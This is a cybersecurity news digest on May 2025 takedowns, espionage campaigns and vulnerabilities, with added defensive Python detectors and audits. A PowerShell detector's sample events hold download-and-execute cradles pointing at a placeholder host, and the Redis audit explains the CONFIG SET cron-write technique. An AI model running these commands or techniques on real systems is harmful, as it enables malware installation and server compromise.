An international law enforcement operation coordinated by Europol and Eurojust has disrupted several global cybercrime networks. From May 19 to 22, 2025, authorities dismantled the infrastructure behind key "initial access malware" used to launch ransomware attacks. This included the takedown of around 300 servers and 650 domains, and the issuance of 20 international arrest warrants. The operation, part of the ongoing Operation ENDGAME, led to the seizure of over €3.5 million in cryptocurrency, adding to more than €21.2 million seized in total.
The crackdown targeted malware strains such as Bumblebee, Qakbot, DanaBot, Trickbot, and others, which enable hackers to infiltrate systems and deploy ransomware. US authorities also charged 16 individuals linked to the Russia-based DanaBot operation, which infected over 300,000 systems and caused at least $50 million in damage. Additionally, a Russian national, Rustam Gallyamov, was charged for leading the Qakbot malware operation, with over $24 million in cryptocurrency seized from him.
At the same time, Europol’s European Cybercrime Centre (EC3), in collaboration with Microsoft and law enforcement agencies across multiple countries, has dismantled the technical infrastructure behind Lumma Stealer (“Lumma”), a widely deployed information-stealing malware. The US Department of Justice (DOJ) dismantled the malware’s central command systems and took action against online marketplaces that trafficked in the tool.
In an unrelated action, Operation RapTor, coordinated by Europol, has led to the arrest of 270 individuals involved in dark web criminal activities (vendors, buyers, and administrators) across 11 countries, including Austria, Brazil, France, Germany, the Netherlands, South Korea, Spain, Switzerland, the United Kingdom, and the United States. Authorities seized over $200 million in cash and digital assets, more than two metric tons of drugs, 144 kg of fentanyl or fentanyl-laced substances, and over 180 firearms.
The European Union has imposed new sanctions targeting three clusters of Russian-linked disinformation networks operating in Europe and Africa. The move marks the bloc’s 17th sanctions package against Moscow in response to its 2022 invasion and ongoing war in Ukraine.
According to a report by the Spanish Department of National Security, Russia attempted to influence elections and internal politics in Moldova, Romania, and Georgia through disinformation campaigns. The goal was to weaken their pro-European integration course and bring them back under Russian influence. Fake news, anonymous channels, and content generated using artificial intelligence were used. The report also mentions the large-scale operation ‘Doppelgänger,’ which involves tens of thousands of accounts and hundreds of websites. Similar actions have been observed in other countries, including Spain and the United States.
Between January and February 2025, the Russia-aligned threat group TAG-110 launched a phishing campaign targeting Tajikistan, using macro-enabled Word templates (.dotm files) disguised as government-themed documents. TAG-110, linked to APT28 (BlueDelta) and overlapping with UAC-0063, appears to be conducting cyber-espionage to support Russian interests in Central Asia, especially around politically sensitive periods.
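The detail worth acting on above is the lure format: a macro-enabled Word template. An OOXML file is a zip package, so whether it carries a VBA project and which kind of main part it declares can be read without opening it in Word. The following checker is an added example written for this article, not code from TAG-110 reporting; the sample packages it builds are constructed stand-ins with only the parts the check inspects, and the filenames are invented.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from dataclasses import dataclass
from typing import Optional

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
VBA_PART = "word/vbaProject.bin"

# Main-part content types Word uses for macro-enabled files (.docm / .dotm).
MACRO_MAIN_TYPES = {
    "application/vnd.ms-word.document.macroEnabled.main+xml": "macro-enabled document",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml": "macro-enabled template",
}
DOCX_MAIN = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
DOTM_MAIN = "application/vnd.ms-word.template.macroEnabledTemplate.main+xml"


@dataclass
class Verdict:
    has_vba_project: bool           # word/vbaProject.bin is present in the package
    macro_main_type: Optional[str]  # declared main part is a macro-enabled kind
    extension_mismatch: bool        # macro payload inside a file named .docx/.dotx

    @property
    def suspicious(self) -> bool:
        return self.has_vba_project or self.macro_main_type is not None or self.extension_mismatch


def inspect_ooxml(data: bytes, filename: str) -> Verdict:
    """Inspect an OOXML zip for macro indicators without rendering it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        root = ET.fromstring(zf.read("[Content_Types].xml"))
    declared = {o.get("ContentType") for o in root.iter(CT_NS + "Override")}
    macro_type = next((label for ct, label in MACRO_MAIN_TYPES.items() if ct in declared), None)
    has_vba = VBA_PART in names
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    # A .docx/.dotx must never carry a VBA project or a macro-enabled main part.
    mismatch = ext in {"docx", "dotx"} and (has_vba or macro_type is not None)
    return Verdict(has_vba, macro_type, mismatch)


def build_sample(main_type: str, with_vba: bool) -> bytes:
    """Constructed minimal OOXML package for testing; not a real Word file."""
    overrides = [f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>']
    if with_vba:
        overrides.append('<Override PartName="/word/vbaProject.bin" '
                         'ContentType="application/vnd.ms-office.vbaProject"/>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        + "".join(overrides) + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            # OLE magic bytes only; a real vbaProject.bin is a full compound file.
            zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0" + b"\x00" * 12)
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("decree.dotm", build_sample(DOTM_MAIN, True)),   # what the lure looks like
        ("memo.docx", build_sample(DOCX_MAIN, False)),    # ordinary document
        ("memo.docx", build_sample(DOTM_MAIN, True)),     # macro template renamed to .docx
    ]
    for name, blob in samples:
        print(name, inspect_ooxml(blob, name))
```

The extension check matters because Word opens a file according to the content types declared inside the package, not the file name, so a macro-enabled template renamed to .docx still runs its macros; mail gateways that only filter by extension miss it.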
This week, 21 intelligence and cybersecurity agencies from 11 countries accused Russia's military intelligence unit known as the 85th Main Special Service Center (GTsSS), Military Unit 26165 of the GRU (also tracked as Fancy Bear, APT28, and BlueDelta), of attempting break-ins at dozens of strategic targets, particularly in NATO member states, Ukraine, and international organizations.
EclecticIQ analysts have spotted active exploitation of a vulnerability chain in Ivanti Endpoint Manager Mobile (EPMM) that includes CVE-2025-4428 by a China-linked threat group known as UNC5221. The exploitation began as early as May 15, 2025, targeting internet-facing Ivanti EPMM systems. Affected sectors include healthcare, telecommunications, aviation, municipal government, finance, and defense across Europe, North America, and the Asia-Pacific.
A Chinese-speaking threat actor has been observed exploiting a critical remote code execution (RCE) vulnerability (CVE-2025-0994) in the widely used asset management platform Trimble Cityworks. The activity, detected by Cisco’s Talos threat intelligence team, has been attributed to a threat cluster tracked as “UAT-6382,” believed to involve Chinese-speaking actors. The attacks have been ongoing since at least January 2025 and have specifically targeted enterprise networks associated with local government agencies in the United States, particularly those linked to utilities management systems.
A Chinese intelligence ring operating in Turkey was recently dismantled by Turkish intelligence, local media reported. Seven suspects were caught in possession of IMSI-catcher devices—fake mobile towers used to spy on phone communications. The group had allegedly been monitoring Uyghurs and Turkish officials. While some operatives reportedly entered Turkey in March, the operation is believed to have been active for five years. Its leader, a Chinese national identified as ZL, had set up front companies and learned Turkish to support the espionage activities.
A recent investigation by the Foundation for Defense of Democracies (FDD) and cybersecurity firm TeamT5 reveals that Beijing is using a single online recruitment scheme to target both the United States and Taiwan.
The operation, linked to the Chinese tech firm Smiao Intelligence and dubbed the ‘Smiao Network,’ involves fake consulting companies posing as recruiters on online work platforms. Initially exposed for targeting laid-off US federal workers, the same approach is now being used to target individuals in Taiwan. Although FDD found no evidence of success in this latest effort, similar tactics previously led to the recruitment of a US Army intelligence analyst who leaked over 92 sensitive military documents.
ESET has detailed the tactics of a China-aligned threat group, dubbed UnsolicitedBooker, which targeted an international organization in Saudi Arabia using a previously undocumented backdoor called MarsSnake.
Cybersecurity researchers have uncovered that a threat group known as ViciousTrap has compromised approximately 5,300 network edge devices across 84 countries, transforming them into a large-scale honeypot-like network. The attackers exploited a critical vulnerability (CVE-2023-20118) in several Cisco Small Business router models to take control of the devices. The highest concentration of infections was found in Macau. The attack involves a shell script called NetGhost, which reroutes traffic from specific ports on the compromised routers to attacker-controlled infrastructure, enabling them to monitor and intercept network traffic.
The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that Commvault is actively monitoring cyber threats targeting its Microsoft Azure-hosted applications. Commvault Web Server contains a vulnerability (CVE-2025-3928) that allows a remote, authenticated attacker to potentially compromise the system by creating and executing webshells. The flaw affects both Windows and Linux platforms. Commvault has addressed the issue in the following fixed versions: 11.36.46, 11.32.89, 11.28.141, and 11.20.217.
Specifically, threat actors may have accessed client secrets for Commvault's Metallic Microsoft 365 (M365) backup SaaS solution, potentially giving them unauthorized access to customers' M365 environments. CISA believes the incident could be part of a broader campaign targeting cloud infrastructures of various SaaS providers that use default configurations and elevated permissions.
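The fixed versions listed above are per feature-release branch, so "is my server patched?" is a branch-aware comparison, not a single threshold. The helper below is an added example for this article, not Commvault's own tooling; it encodes only the four fixed builds named here, treats any other branch as unknown rather than guessing, and assumes the version string has the major.minor.maintenance shape shown in the advisory.

```python
from typing import Optional, Tuple

# Fixed builds named in the advisory, keyed by feature-release branch (major, minor).
FIXED_BY_BRANCH = {
    (11, 20): (11, 20, 217),
    (11, 28): (11, 28, 141),
    (11, 32): (11, 32, 89),
    (11, 36): (11, 36, 46),
}


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Accept 'major.minor.maintenance'; anything else is reported as unparseable."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    major, minor, maint = (int(p) for p in parts)
    return (major, minor, maint)


def cve_2025_3928_status(version_text: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown' for a Commvault Web Server version."""
    version = parse_version(version_text)
    if version is None:
        return "unknown"
    fixed = FIXED_BY_BRANCH.get(version[:2])
    if fixed is None:
        # Branch not covered by the listed fixes: do not infer, check the vendor notice.
        return "unknown"
    # Later maintenance releases on the same branch carry the fix forward.
    return "patched" if version >= fixed else "vulnerable"


if __name__ == "__main__":
    # Constructed inventory of version strings, as a fleet export might produce them.
    for v in ["11.36.45", "11.36.46", "11.36.50", "11.28.140", "11.20.217", "11.34.10", "11.36"]:
        print(v, "->", cve_2025_3928_status(v))
```

Note that this only answers the patch question; the second half of the advisory, possibly exposed M365 client secrets, is not fixed by upgrading and needs the secrets rotated and the app registrations reviewed.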
A new malware campaign is exploiting TikTok’s popularity to spread information-stealing malware like Vidar and StealC. The attackers use AI-generated short videos that verbally and visually guide users to run PowerShell commands, claiming these will activate software like Microsoft Office or Spotify. Unlike traditional attacks, the commands aren't shared via text or links, making them difficult for security tools to detect. Instead, viewers are tricked into manually typing the commands, unknowingly initiating the malware infection themselves.
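Because the command is typed by the victim rather than delivered in a file, the place it shows up is process-creation telemetry: a PowerShell child of the desktop shell whose command line fetches remote content and executes it in one step. The detector below is an added example written for this article, not from the research it summarizes; the events it runs over are constructed, the field names (CommandLine, ParentImage) follow the Sysmon convention, and the URLs are placeholders under the reserved .invalid domain.

```python
import base64
import re
from typing import Dict, List, Optional

# Fetch primitives (curl/wget are Invoke-WebRequest aliases in Windows PowerShell).
DOWNLOAD = re.compile(
    r"(?i)\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile"
    r"|Net\.WebClient|curl|wget)\b")
EXECUTE = re.compile(r"(?i)\b(iex|Invoke-Expression)\b")
# -EncodedCommand and its accepted short forms, followed by a base64 blob.
ENCODED = re.compile(r"(?i)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})")
EVASION = re.compile(r"(?i)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass"
                     r"|executionpolicy\s+bypass)")
USER_SHELLS = {"explorer.exe", "cmd.exe"}  # parents typical of a command typed by hand


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand payloads are base64 of UTF-16LE script text."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like a hand-typed download-and-run lure."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons: List[str] = []
    inner = decode_encoded_command(cmd)
    if inner is not None:
        reasons.append("encoded command, decoded: " + inner.strip())
    text = cmd + " " + (inner or "")           # inspect the visible and decoded script
    if DOWNLOAD.search(text) and EXECUTE.search(text):
        reasons.append("download-and-execute cradle")
    if EVASION.search(cmd):
        reasons.append("hidden window / policy bypass switches")
    if parent in USER_SHELLS:
        reasons.append(f"launched interactively from {parent}")
    return reasons


def is_flagged(event: Dict[str, str]) -> bool:
    reasons = assess(event)
    cradle = any(r.startswith("download-and-execute") for r in reasons)
    encoded_interactive = (any(r.startswith("encoded") for r in reasons)
                           and any(r.startswith("launched") for r in reasons))
    return cradle or encoded_interactive


# Constructed events, not real telemetry.
_ENCODED_PAYLOAD = base64.b64encode("iex (iwr http://example.invalid/s)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/activate.ps1)"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {_ENCODED_PAYLOAD}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_flagged(ev), assess(ev))
```

The third sample shows why decoding matters: the visible command line contains neither a URL nor iex, and only the decoded UTF-16LE payload reveals the cradle.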
According to new research from Sophos, DragonForce is engaged in a “turf war” with rival ransomware groups as it attempts to dominate the cybercrime market. Following its rebranding as a ‘cartel’ in March 2025, DragonForce launched attacks on competing ransomware-as-a-service (RaaS) operators. Notably, the group is believed to be behind the infrastructure outage that hit RansomHub in late March, which led to a marked decline in ransomware activity in April. This may signal an attempted hostile takeover by DragonForce to expand its influence.
The VanHelsing ransomware-as-a-service (RaaS) operation has publicly released the source code for its Windows encryptor builder, affiliate panel, and Tor-hosted data leak site. The leak took place after a former developer, known as ‘th30c0der’, attempted to sell the tools on the RAMP cybercrime forum for $10,000. The package he offered included both Windows and Linux ransomware builders along with Tor site keys and various backend components. However, the publicly leaked archive only contains the Windows encryptor builder and related components, with the Linux builder and associated databases notably absent.
Researchers at Prodaft have warned of growing adoption of a new stealthy malware dubbed Skitnet, also known as "Bossnet," among ransomware gangs to maintain covert access and control in compromised enterprise networks. Notably, the malware has been used in real-world attacks by operations including BlackBasta, which reportedly deployed it during Microsoft Teams phishing campaigns, and Cactus.
A threat actor has been running an ongoing and sophisticated campaign involving malicious Chrome browser extensions, first detected in February 2024. The extensions, while appearing as useful productivity tools or legitimate services, are in fact sophisticated tools for cyber espionage, data exfiltration, and browser hijacking.
Palo Alto Networks’ Unit 42 researchers have uncovered a sophisticated malicious campaign aimed at dozens of Portuguese organizations, with a focus on the government, finance, and transportation sectors. The campaign is the latest operation by the threat actors behind the Lampion malware, an infostealer known for its focus on sensitive banking data, which has been in circulation since at least 2019.
A sophisticated cybercriminal group dubbed Hazy Hawk has been linked to a widespread campaign hijacking abandoned cloud infrastructure, including Amazon S3 buckets and Microsoft Azure endpoints, by exploiting misconfigured Domain Name System (DNS) records.
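The misconfiguration behind this kind of hijack is a CNAME that still points at a cloud hostname whose underlying resource (bucket, web app, CDN distribution) has been deleted, leaving a name anyone can re-register. The audit below is an added example for this article, not Hazy Hawk tooling or any cloud vendor's API; the zone and the set of "still live" targets are constructed so it runs offline, and the claimable-suffix patterns are a starting set I am asserting from the public hostname formats of those services, not a complete list.

```python
import re
import socket
from typing import Callable, Dict

# Cloud hostname families allocated first-come, first-served: a CNAME to one of these that
# no longer resolves is a takeover candidate. Starting set, extend for your providers.
CLAIMABLE = [
    re.compile(r"\.s3(?:-website)?(?:[.-][a-z0-9-]+)?\.amazonaws\.com$"),
    re.compile(r"\.azurewebsites\.net$"),
    re.compile(r"\.cloudapp\.azure\.com$"),
    re.compile(r"\.blob\.core\.windows\.net$"),
    re.compile(r"\.trafficmanager\.net$"),
    re.compile(r"\.cloudfront\.net$"),
]


def is_claimable(target: str) -> bool:
    return any(p.search(target) for p in CLAIMABLE)


def resolves_live(host: str) -> bool:
    """Real resolver for production use: True if the name has any address record."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def find_dangling(cnames: Dict[str, str], resolves: Callable[[str], bool]) -> Dict[str, str]:
    """Classify each CNAME as 'ok', 'dangling' or 'dangling-claimable'.

    Only the CNAME target is resolved; if it is NXDOMAIN the owner name is dangling,
    and if the target is in a claimable family an attacker can take the name over.
    """
    result: Dict[str, str] = {}
    for owner, target in cnames.items():
        target = target.rstrip(".").lower()
        if resolves(target):
            result[owner] = "ok"
        elif is_claimable(target):
            result[owner] = "dangling-claimable"
        else:
            result[owner] = "dangling"
    return result


# Constructed zone export (owner -> CNAME target) under the reserved .example TLD.
ZONE = {
    "www.corp.example": "corp-prod.azurewebsites.net",
    "assets.corp.example": "corp-assets-2019.s3.amazonaws.com",
    "promo.corp.example": "old-site.s3-website-eu-west-1.amazonaws.com",
    "docs.corp.example": "docs-host.partner.example",
}
# Constructed resolver answers: everything not listed here is treated as NXDOMAIN.
STILL_LIVE = {"corp-prod.azurewebsites.net"}


def stub_resolver(host: str) -> bool:
    return host in STILL_LIVE


if __name__ == "__main__":
    for owner, status in find_dangling(ZONE, stub_resolver).items():
        print(f"{owner:28} {status}")
```

Run with resolves_live in place of the stub against a real zone export; a "dangling" result on a non-cloud target still deserves cleanup, but the "dangling-claimable" ones are the records to delete first, since those are the ones a third party can resurrect with their own content under your name.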
The official website for RVTools has been hacked to distribute a malicious installer. The breach came to light after a security researcher discovered that a tampered installer from the official website was being used to sideload a malicious DLL file. The malware in question was identified as Bumblebee, a known loader used in various high-profile cyberattacks to deploy additional payloads, establish persistence, and facilitate ransomware operations.
In an unrelated incident, cybercriminals have been distributing malicious versions of the open-source KeePass password manager for at least eight months as part of a sophisticated campaign to steal credentials, deploy Cobalt Strike beacons, and ultimately launch ransomware attacks.
A new Linux-based cryptojacking campaign dubbed RedisRaider is exploiting publicly accessible Redis servers, according to researchers at Datadog Security Labs. The campaign uses legitimate Redis configuration commands to inject malicious cron jobs on vulnerable systems.
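The abuse path described here is the long-standing one: a Redis instance reachable without authentication accepts CONFIG SET dir and CONFIG SET dbfilename, after which SAVE writes the dataset to an attacker-chosen path such as a cron spool. The audit below is an added example for this article, not Datadog's code; it checks a redis.conf for the settings that make that path possible and shows a weak configuration beside a hardened one. Both configurations are constructed, and the requirepass value is a placeholder.

```python
from typing import Dict, List

WEAK_CONF = """\
# Constructed: a "just make it reachable from the app servers" configuration.
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
"""

HARDENED_CONF = """\
# Constructed: same instance with the exposure points closed.
bind 127.0.0.1 ::1
port 6379
protected-mode yes
# placeholder secret; use a long random value or ACL users in production
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
# Redis 7+: refuses CONFIG SET on dir/dbfilename even if CONFIG stays reachable
enable-protected-configs no
dir /var/lib/redis
"""


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Directive -> list of argument lists. Redis treats only whole-line '#' as comments."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(conf: Dict[str, List[List[str]]]) -> List[str]:
    findings: List[str] = []
    binds = [arg for args in conf.get("bind", []) for arg in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("listens on all interfaces (no bind, or bind 0.0.0.0/*)")
    if any(args[:1] == ["no"] for args in conf.get("protected-mode", [])):
        findings.append("protected-mode no: unauthenticated remote clients are accepted")
    # Authentication: legacy requirepass, an external ACL file, or inline 'user' rules with a
    # password (">plain" or "#sha256") all count; absence means anyone who can connect is admin.
    acl_users_with_pw = any(any(tok[:1] in (">", "#") for tok in args)
                            for args in conf.get("user", []))
    if not ("requirepass" in conf or "aclfile" in conf or acl_users_with_pw):
        findings.append("no authentication configured")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    protected_configs_off = any(args[:1] == ["no"]
                                for args in conf.get("enable-protected-configs", []))
    if "CONFIG" not in renamed and not protected_configs_off:
        findings.append("CONFIG SET dir/dbfilename reachable: a connected client can write "
                        "files via SAVE (cron spool, authorized_keys, ...)")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(parse_redis_conf(text)) or ["no findings"])
```

The four findings on the weak configuration are exactly the preconditions for writing a cron job through Redis: reachable from the network, no protected mode, no password, and CONFIG still callable. Closing any one of them breaks the chain; the hardened file closes all four.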
Decentralized crypto exchange Cetus suffered a major security breach, resulting in the theft of approximately $223 million. The platform was paused shortly after the incident as a precaution, and Cetus later confirmed the attack. The company said it had successfully paused $162 million of the compromised funds to prevent further losses. While investigations continue, theories about the hack's cause include a protocol vulnerability and potential price manipulation.
The Japanese government has passed a cybersecurity law that authorizes local agencies to conduct preemptive cyber operations aimed at thwarting or suppressing future attacks on the country’s digital infrastructure. Formally titled the Active Cyberdefense Law, the legislation was approved last week and is scheduled to come into full effect by 2027. Under the new law, operators of critical infrastructure such as power grids and railway systems will be legally required to report cyber breaches.